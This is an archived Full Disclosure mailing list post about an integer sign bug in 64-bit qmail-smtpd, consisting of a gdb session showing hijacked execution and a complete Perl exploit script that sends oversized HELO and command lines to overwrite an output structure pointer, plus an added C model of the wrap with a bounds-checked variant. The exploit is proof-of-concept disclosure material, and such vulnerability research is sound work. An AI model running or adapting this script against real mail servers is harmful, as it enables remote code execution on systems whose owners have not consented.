Full Disclosure mailing list archives
Re: 64 bit qmail fun
From: Georgi Guninski <guninski () guninski com>
Date: Sun, 15 May 2005 15:48:49 +0300
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
> 2. pointer + signed int in commands.c
>
>     int i;
>     ...
>     i = str_chr(cmd.s,' ');
>     ...
>     cmd.s[i] = 0;
problem #2 is exploitable at least on freebsd 5.4 amd64 with a lot of virtual memory. djb's original qmail was compiled with debug info, no optimizations and not stripped.

Breakpoint 1, commands (ss=0x507520, c=0x507540) at commands.c:34
34        cmd.s[i] = 0;
(gdb) p cmd
$12 = {s = 0x4b507000 '\314' <repeats 200 times>..., len = 3036683527,
                                                     ^^^^^^^^^^
  a = 3184650962}
(gdb) p i
$13 = -1258283773
(gdb) p &cmd.s[i]
$14 = 0x508d03 "K"
(gdb) next
36        for (i = 0;c[i].text;++i) if (case_equals(c[i].text,cmd.s)) break;
(gdb) p cmd
$15 = {s = 0x507000 " server failed (#4.4.2)", len = 3036683527,
                      ^^^^^^^^^^^^^
  a = 3184650962}
(gdb) p &ssout
$16 = (substdio *) 0x507500
(gdb) p &ssout.op
$17 = (int (**)()) 0x507518
(gdb) cont

Program received signal SIGTRAP, Trace/breakpoint trap.
0x000000000050cbac in ?? ()
(gdb) x/i $rip
0x50cbac:       int3
(gdb) p ssout
$18 = {
  x = 0x102030405060708 <Error reading address 0x102030405060708: Bad address>,
  p = 0, n = 32, fd = 2, op = 0x50cbab}
(gdb) info stack
#0  0x000000000050cbac in ?? ()
#1  0x0000000000405bce in allwrite (op=0x50cbab, fd=2, buf=0x102030405060708 <Error reading address 0x102030405060708: Bad address>, len=16) at substdo.c:15
#2  0x0000000000405c63 in substdio_flush (s=0x507500) at substdo.c:35
#3  0x0000000000405d6e in substdio_put (s=0x507500, buf=0x406988 "502 unimplemented (#5.5.1)\r\n", len=28) at substdo.c:64
#4  0x0000000000405efc in substdio_puts (s=0x507500, buf=0x406988 "502 unimplemented (#5.5.1)\r\n") at substdo.c:100
#5  0x0000000000400daf in out (s=0x406988 "502 unimplemented (#5.5.1)\r\n") at qmail-smtpd.c:43
#6  0x0000000000400f13 in err_unimpl () at qmail-smtpd.c:54
(gdb) x/i helohost.s
0x50c000:       int3
(gdb) p &cmd
$19 = (stralloc *) 0x508d00

qmlong-pubvvv5.pl - run on freebsd 5.4 amd64
------------------------
#!/usr/bin/perl -w
# copyright georgi guninski
# cannot be used in vulnerability databases
use strict;
use IO::Socket;

my $host = $ARGV[0] || "localhost";
my $port = $ARGV[1] || 25;
my $sock = IO::Socket::INET->new(Proto => 'TCP', PeerAddr => $host, PeerPort => $port)
    || die("socket");
#my $sock;
#open ($sock, '+>', "/dev/null") || die("open");

# offset of the first space in the second line; str_chr() returns it as a
# 32-bit value and commands.c stores it in `int i`, so it becomes negative
##my $wriaddr = 0xb5bfa660 - 0x140;
my $wriaddr = 0xb5001e43 - 0x140;
my $wrimeg  = int($wriaddr / (1024*1024));
my $wrioff  = $wriaddr % (1024*1024);

# length of the HELO argument; helohost.s ends up filled with int3
# (see "x/i helohost.s" above) and op = 0x50cbab points into it
my $headdr = 0x42aa6000;
my $heameg = int($headdr / (1024*1024));
my $heaoff = $headdr % (1024*1024);
print $wrimeg . " " . $wrioff;

my $payload = "\xcc" x (1024*1024);   # one megabyte of int3
my $i = 0;

# stage 1: a HELO line whose argument is $headdr bytes long
print $sock "HELO ";
while (42) {
    print $sock $payload;
    $i++;
    print "${i}\n";
    if ($i == $heameg) { last; }
}
print $sock "v" x $heaoff;
print $sock "\r\n";
print "\nHELO sent\n";

# stage 2: a line with its first space at offset $wriaddr, so cmd.s[i] = 0
# lands below the buffer (at 0x508d03 in the session above, inside cmd.s)
$i = 0;
while (42) {
    print $sock $payload;
    $i++;
    print "${i}\n";
    if ($i == $wrimeg) { last; }
}
my $zer1 = "v" x $wrioff . " vvv\r\n";
print $zer1;
print $sock $zer1;
print "\nspace/zero sent\n";

# stage 3: with cmd.s now 0x507000, the next line is read into that buffer;
# 0x500 bytes in it overwrites ssout (0x507500) with a fake substdio whose
# op is 0x50cbab, reached when the "502 unimplemented" reply is flushed
$i = 0;
my $vvover = "AB" . ("v" x (0x500-2));
$vvover .= pack("Q", 0x0102030405060708); #x
$vvover .= pack("I", 0x10);
$vvover .= pack("I", 0x20);
$vvover .= pack("I", 0x2);
$vvover .= pack("I", 0x42);
$vvover .= pack("Q", 0x50cbab); #op
$vvover .= "\x21" . "\n" x 100;
## ^^^ ssin.x + 1
print $sock $vvover;
print "\nprobably done\n";
while (42) {};   # keep the connection open

--
where do you want bill gates to go today?
** junk

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
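The following is an added example, not code from qmail or from the post above. It models the integer conversions behind problem #2 on an LP64 target (the pointer difference `t - s` inside qmail's `str_chr()` is 64-bit, its `unsigned int` return type keeps the low 32 bits, and `int i` in `commands()` then reads values of 2^31 and above as negative) without allocating the multi-gigabyte line the real exploit needs. The inputs are the values visible in the gdb session: `cmd.s = 0x4b507000` and a first space at offset `0xb5001e43 - 0x140` (the script's `wriaddr`); the model reproduces `i = -1258283773` and `&cmd.s[i] = 0x508d03`, which is `&cmd + 3`, i.e. the fourth byte of the `cmd.s` pointer itself, consistent with `cmd.s` reading `0x507000` afterwards. The `safe_nul_target` variant is my own hardened form (a `size_t` offset plus a bounds check), not a qmail patch; the function names and the use of `uint64_t` for addresses are assumptions of this example.

```c
#include <stdint.h>
#include <inttypes.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Added example, not qmail code. Addresses and offsets are modelled as
 * uint64_t so the LP64 behaviour is reproduced regardless of host ABI.
 * `space_pos` is the offset of the first ' ' from cmd.s (or of the
 * terminating NUL when the line has no space).
 */

/* What `i = str_chr(cmd.s,' ')` yields in commands.c. */
static int qmail_space_index(uint64_t space_pos)
{
    int64_t diff = (int64_t)space_pos;      /* t - s: 64-bit ptrdiff_t      */
    unsigned int ret = (unsigned int)diff;  /* str_chr() returns unsigned int */
    int i = (int)ret;                       /* `int i;` in commands(); >= 2^31
                                               wraps negative with gcc/clang */
    return i;
}

/* Address that `cmd.s[i] = 0` actually hits. */
static uint64_t vulnerable_nul_target(uint64_t cmd_s, uint64_t space_pos)
{
    int i = qmail_space_index(space_pos);
    /* sign-extend i and add modulo 2^64, like the pointer arithmetic does */
    return cmd_s + (uint64_t)(int64_t)i;
}

/*
 * Hardened form (my suggestion): keep the offset in size_t and only write
 * inside the allocation. commands.c itself stores the line's NUL at
 * cmd.s[cmd.len], so an offset equal to cmd_len is still in bounds.
 * Returns 0 when the write would fall outside the buffer.
 */
static uint64_t safe_nul_target(uint64_t cmd_s, size_t cmd_len, size_t space_pos)
{
    if (space_pos > cmd_len) return 0;
    return cmd_s + (uint64_t)space_pos;
}

int main(void)
{
    /* constructed from the gdb session and the script above */
    uint64_t cmd_s     = 0x4b507000ULL;
    uint64_t space_pos = 0xb5001e43ULL - 0x140;
    size_t   cmd_len   = 3036683527ULL;   /* len shown by `p cmd` */

    printf("i          = %d\n", qmail_space_index(space_pos));       /* -1258283773 */
    printf("&cmd.s[i]  = 0x%" PRIx64 "\n",
           vulnerable_nul_target(cmd_s, space_pos));                 /* 0x508d03 */
    printf("safe write = 0x%" PRIx64 "\n",
           safe_nul_target(cmd_s, cmd_len, space_pos));              /* 0x100508d03 */
    printf("rejected   = 0x%" PRIx64 "\n",
           safe_nul_target(cmd_s, 100, space_pos));                  /* 0 */
    return 0;
}
```

The same wrap applies to any offset between 2^31 and 2^32 - 1: the NUL lands `2^32 - offset` bytes before `cmd.s`, which is why the attacker can choose, via the line length, exactly which byte below the buffer gets zeroed.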
Current thread:
- 64 bit qmail fun Georgi Guninski (May 06)
- Re: 64 bit qmail fun Lars Olsson (May 06)
- Re: 64 bit qmail fun Georgi Guninski (May 09)
- Re: 64 bit qmail fun Georgi Guninski (May 15)